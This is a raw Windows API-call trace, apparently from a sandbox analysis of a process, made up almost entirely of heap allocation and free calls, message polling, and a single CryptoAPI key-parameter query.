[0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0171.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0171.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0171.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0171.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0171.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.131] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0171.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0171.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0171.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0171.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0171.132] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0171.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0171.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0171.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0171.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0171.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0171.133] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0171.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0171.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0171.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0171.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0171.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0171.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0171.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0171.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0171.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0171.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0171.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0171.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0171.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0171.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0171.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0171.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0171.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0171.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0171.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0171.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0171.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0171.138] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0171.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0171.139] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2638, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2638*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 